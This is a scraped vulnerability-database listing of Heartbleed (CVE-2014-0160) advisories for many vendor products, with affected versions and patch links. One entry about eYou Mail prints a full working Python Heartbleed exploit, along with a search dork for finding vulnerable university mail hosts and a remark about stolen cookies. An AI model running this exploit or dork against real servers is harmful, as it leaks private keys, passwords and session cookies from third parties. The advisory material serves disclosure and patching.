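    descriptionCVE ID:CVE-2014-0160 IBM XIV Storage System is a grid storage solution. The OpenSSL bundled with IBM XIV Storage System has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 IBM XIV Storage System 11.3.0 IBM XIV Storage System 11.3.0.a IBM XIV Storage System 11.3.1 IBM XIV Storage System 11.4.1 IBM XIV Storage System 11.4.1.a Users can refer to the following vendor security advisory to obtain a patch that fixes this vulnerability: http://www.ibm.com/support/docview.wss?uid=ssg1S1004577
    idSSV:62188
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleIBM XIV Storage System OpenSSL TLS/DTLS Heartbeat Information Disclosure Vulnerability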
  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:86061
    last seen2017-11-19
    modified2014-07-01
    published2014-07-01
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-86061
    titleHeartbleed OpenSSL - Information Leak Exploit (1)
  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:86255
    last seen2017-11-19
    modified2014-07-01
    published2014-07-01
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-86255
    titleHeartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support
  • bulletinFamilyexploit
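    descriptionCVE ID:CVE-2014-0160 SAP Sybase SQL Anywhere is a comprehensive solution that provides data management, synchronization and data exchange technologies for rapidly developing and deploying database-driven applications in remote and mobile environments. The OpenSSL bundled with SAP Sybase SQL Anywhere has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 SAP Sybase SQL Anywhere 12.x SAP Sybase SQL Anywhere 16.x SAP Sybase SQL Anywhere 12.01 ebf 4099 or 16.0 ebf 1881 fixes this vulnerability; users are advised to download it from: http://www.sap.com
    idSSV:62244
    last seen2017-11-19
    modified2014-04-21
    published2014-04-21
    reporterRoot
    titleSAP Sybase SQL Anywhere OpenSSL TLS Heartbeat Information Disclosure Vulnerability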
  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:86038
    last seen2017-11-19
    modified2014-07-01
    published2014-07-01
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-86038
    titleOpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)
  • bulletinFamilyexploit
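    descriptionCVE ID:CVE-2014-0160 Splunk is an engine for machine data. Splunk can collect, index and make use of the fast-moving machine data generated by all applications, servers and devices (physical, virtual and in the cloud). The OpenSSL bundled with Splunk has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit 0 Splunk 6.x Splunk 6.0.3 fixes this vulnerability; users are advised to download it from: http://www.splunk.com
    idSSV:62198
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleSplunk OpenSSL TLS Heartbeat Information Disclosure Vulnerability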
  • bulletinFamilyexploit
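    descriptionCVE ID:CVE-2014-0160 OpenSSL is an open-source SSL implementation that provides strong encryption for network communications and is now widely used in all kinds of network applications. Because of a boundary error when handling the TLS heartbeat extension, attackers can exploit the vulnerability to disclose the memory contents of a connected client or server. 0 OpenSSL 1.0.2-beta OpenSSL 1.0.1 OpenSSL 1.0.1g fixes this vulnerability; users are advised to upgrade: http://www.openssl.org/
    idSSV:62086
    last seen2017-11-19
    modified2014-04-08
    published2014-04-08
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-62086
    titleOpenSSL TLS Heartbeat Information Disclosure Vulnerability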
  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:86019
    last seen2017-11-19
    modified2014-07-01
    published2014-07-01
    reporterlele
    sourcehttps://www.seebug.org/vuldb/ssvid-86019
    titleOpenSSL TLS Heartbeat Extension - Memory Disclosure
  • bulletinFamilyexploit
    description
    ### Brief description:
    Packaged up a bunch of websites; there are cookies in memory :D
    ### Details:
    Searching for "eYouMail 5 inurl:edu" turns up hosts with roughly a 90% chance of being vulnerable. Successful results from the first three pages.
    PoC provided; test it yourself.
    ```
    #!/usr/bin/python

    # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
    # The author disclaims copyright to this source code.

    import sys
    import struct
    import socket
    import time
    import select
    import re
    from optparse import OptionParser

    options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
    options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

    def h2bin(x):
        return x.replace(' ', '').replace('\n', '').decode('hex')

    hello = h2bin('''
    16 03 02 00 dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
    00 0f 00 01 01
    ''')

    hb = h2bin('''
    18 03 02 00 03
    01 40 00
    ''')

    def hexdump(s):
        for b in xrange(0, len(s), 16):
            lin = [c for c in s[b : b + 16]]
            hxdat = ' '.join('%02X' % ord(c) for c in lin)
            pdat = ''.join((c if 32 <= ord(c) <= 126 else '.') for c in lin)
            print ' %04x: %-48s %s' % (b, hxdat, pdat)
        print

    def recvall(s, length, timeout=5):
        endtime = time.time() + timeout
        rdata = ''
        remain = length
        while remain > 0:
            rtime = endtime - time.time()
            if rtime < 0:
                return None
            r, w, e = select.select([s], [], [], 5)
            if s in r:
                data = s.recv(remain)
                # EOF?
                if not data:
                    return None
                rdata += data
                remain -= len(data)
        return rdata

    def recvmsg(s):
        hdr = recvall(s, 5)
        if hdr is None:
            print 'Unexpected EOF receiving record header - server closed connection'
            return None, None, None
        typ, ver, ln = struct.unpack('>BHH', hdr)
        pay = recvall(s, ln, 10)
        if pay is None:
            print 'Unexpected EOF receiving record payload - server closed connection'
            return None, None, None
        print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
        return typ, ver, pay

    def hit_hb(s):
        s.send(hb)
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                print 'No heartbeat response received, server likely not vulnerable'
                return False

            if typ == 24:
                print 'Received heartbeat response:'
                hexdump(pay)
                #print pay
                if len(pay) > 3:
                    print 'WARNING: server returned more data than it should - server is vulnerable!'
                else:
                    print 'Server processed malformed heartbeat, but did not return any extra data.'
                return True

            if typ == 21:
                print 'Received alert:'
                hexdump(pay)
                print 'Server returned error, likely not vulnerable'
                return False

    def main():
        opts, args = options.parse_args()
        if len(args) < 1:
            options.print_help()
            return

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print 'Connecting...'
        sys.stdout.flush()
        s.connect((args[0], opts.port))
        print 'Sending Client Hello...'
        sys.stdout.flush()
        s.send(hello)
        print 'Waiting for Server Hello...'
        sys.stdout.flush()
        while True:
            typ, ver, pay = recvmsg(s)
            if typ == None:
                print 'Server closed connection without sending Server Hello.'
                return
            # Look for server hello done message.
            if typ == 22 and ord(pay[0]) == 0x0E:
                break

        print 'Sending heartbeat request...'
        sys.stdout.flush()
        s.send(hb)
        hit_hb(s)

    if __name__ == '__main__':
        main()
    ```
    ### Proof of vulnerability:
    [Image: 1.jpg] [Image: 2.jpg]
    Cookies are in memory.
    [Image: 3.jpg]
    idSSV:95013
    last seen2017-11-19
    modified2014-04-11
    published2014-04-11
    reporterRoot
    titleA Certain Version of eYou Mail: OPENSSL heartbleed Works Across the Board
  • bulletinFamilyexploit
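    descriptionCVE ID:CVE-2014-0160 Kerio Control is a firewall system. The OpenSSL bundled with Kerio Control has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 Kerio Control 8.x Kerio Control 8.2.2 patch2 fixes this vulnerability; users are advised to download it from: http://www.kerio.com
    idSSV:62189
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleKerio Control OpenSSL TLS Heartbeat Information Disclosure Vulnerability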
  • bulletinFamilyexploit
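    descriptionCVE ID:CVE-2014-0160 Multiple Barracuda products have a security vulnerability. The OpenSSL bundled with Barracuda has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 Barracuda CudaTel Communication Server 2.x Barracuda CudaTel Communication Server 3.x Barracuda Firewall 6.x Barracuda Link Balancer 2.x Barracuda Load Balancer Barracuda Load Balancer 4.x Barracuda Load Balancer ADC 5.x Barracuda Message Archiver Barracuda Message Archiver 3.x Barracuda Web Application Firewall 7.x Barracuda Web Filter Barracuda Web Filter 7.x The vendor has released an upgrade patch that fixes the vulnerability; download it from: https://www.barracuda.com/blogs/pmblog?bid=2279
    idSSV:62181
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleMultiple Barracuda Products OpenSSL TLS/DTLS Heartbeat Information Disclosure Vulnerability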
  • bulletinFamilyexploit
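    descriptionCVE ID:CVE-2014-0160 Oracle Session Monitor Suite is a session monitoring suite from Oracle. The OpenSSL bundled with Oracle Session Monitor Suite has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 Oracle Session Monitor Suite 3.x Oracle Session Monitor Suite 3.3.40.2.1 fixes this vulnerability; users are advised to download it from: http://www.oracle.com
    idSSV:62240
    last seen2017-11-19
    modified2014-04-21
    published2014-04-21
    reporterRoot
    titleOracle Session Monitor Suite OpenSSL TLS Heartbeat Information Disclosure Vulnerability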
  • bulletinFamilyexploit
    descriptionOpenSSL is an open-source SSL implementation that provides strong encryption for network communications and is now widely used in various network applications. OpenSSL versions before 0.9.8za, 1.0.0m, and 1.0.1h do not properly handle ChangeCipherSpec messages, which allows man-in-the-middle attacks in certain OpenSSL-to-OpenSSL communications through the use of a zero-length master key, followed by a specially crafted TLS handshake to hijack a session and obtain sensitive information. Related: OpenSSL TLS heartbeat read remote information disclosure vulnerability (CVE-2014-0160) http://www.linuxidc.com/Linux/2014-04/99741.htm ; Serious OpenSSL bug allows an attacker to read 64k of memory, fixed by Debian within half an hour http://www.linuxidc.com/Linux/2014-04/99737.htm ; OpenSSL "heartbleed" security vulnerability http://www.linuxidc.com/Linux/2014-04/99706.htm ; Using OpenSSL to provide FTP+SSL/TLS authentication and secure data transmission http://www.linuxidc.com/Linux/2013-05/84986.htm * Source: KIKUCHI Masashi
    idSSV:92577
    last seen2017-11-19
    modified2016-12-20
    published2016-12-20
    reporterRoot
    titleOpenSSL SSL/TLS MITM Vulnerability (CVE-2014-0224)
  • bulletinFamilyexploit
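    descriptionCVE ID:CVE-2014-0160 LibreOffice is a suite compatible with other major office software that runs on a variety of platforms. The OpenSSL bundled with LibreOffice has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 LibreOffice 4.x LibreOffice 4.2.3 fixes this vulnerability; users are advised to download it from: http://www.libreoffice.org/
    idSSV:62190
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleLibreOffice OpenSSL TLS Heartbeat Information Disclosure Vulnerability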
  • bulletinFamilyexploit
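    descriptionCVE ID:CVE-2014-0160 Multiple VMware products have a security vulnerability. The OpenSSL bundled with multiple VMware products has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 Nicira Network Virtualization Platform (NVP) 3.x VMware ESXi 5.x VMware NSX 4.x VMware NSX 6.x VMware Fusion 6.x Vmware Horizon Mirage 4.x VMware Horizon View 5.x VMware Horizon View Client 2.x VMware Horizon Workspace 1.x VMware OVF Tool 3.x VMware vCenter Server 5.x VMware vCloud Networking and Security (vCNS) 5.x No detailed solution is currently available: http://www.vmware.com
    idSSV:62199
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleMultiple VMware Products OpenSSL TLS/DTLS Heartbeat Information Disclosure Vulnerability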
  • bulletinFamilyexploit
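    descriptionCVE ID:CVE-2014-0160 The F-Secure E-mail/Server Security/F-Secure Server Security products have a security vulnerability. The OpenSSL bundled with F-Secure E-mail/Server Security/F-Secure Server Security has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 F-Secure E-mail and Server Security 10.x F-Secure E-mail and Server Security 11.x F-Secure Server Security 10.x F-Secure Server Security 11.x The vendor has released an upgrade patch that fixes the vulnerability; download it from: http://www.f-secure.com/en/web/labs_global/fsc-2014-1
    idSSV:62185
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleF-Secure E-mail/Server Security OpenSSL TLS/DTLS Heartbeat Information Disclosure Vulnerability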
  • bulletinFamilyexploit
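    descriptionCVE ID:CVE-2014-0160 Attachmate Reflection is an excellent Unix terminal emulation program. The OpenSSL bundled with Attachmate Reflection has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 Attachmate Reflection 14.x No detailed solution is currently available: http://www.attachmate.com/
    idSSV:62180
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleAttachmate Reflection OpenSSL TLS Heartbeat Information Disclosure Vulnerability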
  • bulletinFamilyexploit
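    descriptionCVE ID:CVE-2014-0160 WatchGuard Fireware XTM is a firewall appliance. The OpenSSL bundled with WatchGuard Fireware XTM has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 WatchGuard Fireware XTM 11.x WatchGuard Fireware XTM 11.8.3 Update 1 fixes this vulnerability; users are advised to download it from: http://watchguardsecuritycenter.com
    idSSV:62245
    last seen2018-07-03
    modified2014-04-21
    published2014-04-21
    reporterKnownsec
    titleWatchguard Fireware XTM OpenSSL TLS Heartbeat Information Disclosure Vulnerability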
  • bulletinFamilyexploit
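    descriptionCVE ID:CVE-2014-0160 Sophos Antivirus is an antivirus application. The OpenSSL bundled with Sophos Antivirus for vShield has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 Sophos Antivirus for vShield 1.0 Sophos Antivirus for vShield 1.1 No detailed solution is currently available: http://www.sophos.com
    idSSV:62197
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleSophos Antivirus for vShield OpenSSL TLS Heartbeat Information Disclosure Vulnerability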
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 Multiple HP products have a security vulnerability. The OpenSSL bundled with multiple HP products has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 HP Onboard Administrator 4.x HP AssetManager 9.x HP Diagnostics 9.x HP IT Executive Scorecard 9.x HP LoadRunner 11.x HP LoadRunner 12.x HP OpenView Connect-It (CIT) 9.x HP Performance Center 11.x HP Performance Center 12.x HP Server Automation 10.x HP Service Manager 9.x HP Smart Update Manager (HP SUM) 6.x HP System Management Homepage 7.x HP UCMDB Browser 1.x HP UCMDB Browser 2.x HP UCMDB Browser 3.x HP Universal Discovery Universal CMDB Configuration Manager 10.x HP Universal Discovery Universal CMDB Configuration Manager 9.x No detailed solution is currently available: http://www.hp.com
    idSSV:62186
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleMultiple HP Products OpenSSL TLS/DTLS Heartbeat Information Disclosure Vulnerability
  • bulletinFamilyexploit
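    descriptionCVE ID:CVE-2014-0160 OpenVPN is an open-source VPN implementation. The OpenSSL bundled with OpenVPN has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 OpenVPN 2.x OpenVPN 2.3.3-I002 fixes this vulnerability; users are advised to download it from: https://openvpn.net/
    idSSV:62239
    last seen2017-11-19
    modified2014-04-21
    published2014-04-21
    reporterRoot
    titleOpenVPN OpenSSL TLS Heartbeat Information Disclosure Vulnerability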
  • bulletinFamilyexploit
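    descriptionCVE ID:CVE-2014-0160 BlackBerry Link is synchronization software for BlackBerry devices. The OpenSSL bundled with BlackBerry Link has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 BlackBerry Link 1.x No detailed solution is currently available: http://www.blackberry.com
    idSSV:62182
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleBlackBerry Link OpenSSL TLS Heartbeat Information Disclosure Vulnerability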
  • bulletinFamilyexploit
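    descriptionCVE ID:CVE-2014-0160 PostgreSQL is an object-relational database management system that supports an extended subset of the SQL standard. The OpenSSL bundled with PostgreSQL has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 PostgreSQL 8.x PostgreSQL 9.x PostgreSQL 9.3.4-3, 9.2.8-3, 9.1.13-3, 9.0.17-3 and 8.4.21-3 fix this vulnerability; users are advised to download them from: http://www.enterprisedb.com
    idSSV:62241
    last seen2017-11-19
    modified2014-04-21
    published2014-04-21
    reporterRoot
    titlePostgreSQL OpenSSL TLS Heartbeat Information Disclosure Vulnerability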

The Hacker News

Vulner Lab

idVULNERLAB:1254
last seen2019-05-29
modified2014-04-09
published2014-04-09
reporterVulnerability Laboratory [Research Team]
sourcehttp://www.vulnerability-lab.com/get_content.php?id=1254
titleHeartBleed SSL CVE 20140160 - 10 Steps to Fix in Ubuntu

References